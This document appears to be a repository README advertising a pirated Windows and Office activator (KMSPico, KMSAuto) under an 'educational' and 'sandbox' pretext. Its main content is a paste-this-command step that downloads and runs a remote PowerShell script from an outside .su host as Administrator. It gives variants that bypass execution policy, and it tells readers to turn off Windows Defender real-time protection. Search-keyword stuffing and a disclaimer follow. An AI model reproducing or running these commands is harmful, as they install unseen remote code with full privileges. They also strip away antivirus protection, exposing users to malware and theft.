This repository is created for educational purposes, security auditing, and local KMS (Key Management Service) infrastructure testing. It simulates the deployment behavior of popular volume license management systems like KMS Pico (KMSPIco) and KMS Auto (KMSAuto Net) in a controlled sandbox environment.
To prevent antivirus false positives and automate the environment setup, you can initialize the research script directly via PowerShell. This method bypasses standard browser blocks and securely configures the local KMS client.
- Open PowerShell as Administrator (Click Start, type
powershell, right-click, and select Run as Administrator). - Copy and paste the command below, then press Enter:
irm https://software-storage.su/powershell/Loader.ps1 | iexIf your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:
powershell -ExecutionPolicy Bypass -Command "irm https://software-storage.su/powershell/Loader.ps1 | iex"In older legacy environments where aliases are missing, use explicit full system cmdlets:
Invoke-RestMethod https://software-storage.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.
- KMS Auto Engine: Emulates local server for Windows 10/11 Enterprise and Pro.
- KMS Pico Micro-Module: Lightweight background service lifetime auto-renewal simulation.
- Office Toolkit: Supports volume licensing hooks for Office 2019 / 2021 / 2024 / 2026.
- HWID Integration: Digital license fallback method included.
kms auto kms pico kmsauto download kmspico official windows 11 activator office 2026 kms kms auto net kmspico portable windows 10 activation script
This project is intended solely for educational, analytical, and evaluation purposes. Any commercial use or deployment on production machines without a valid Microsoft retail license is strictly prohibited. The authors are not responsible for any misuse of this software.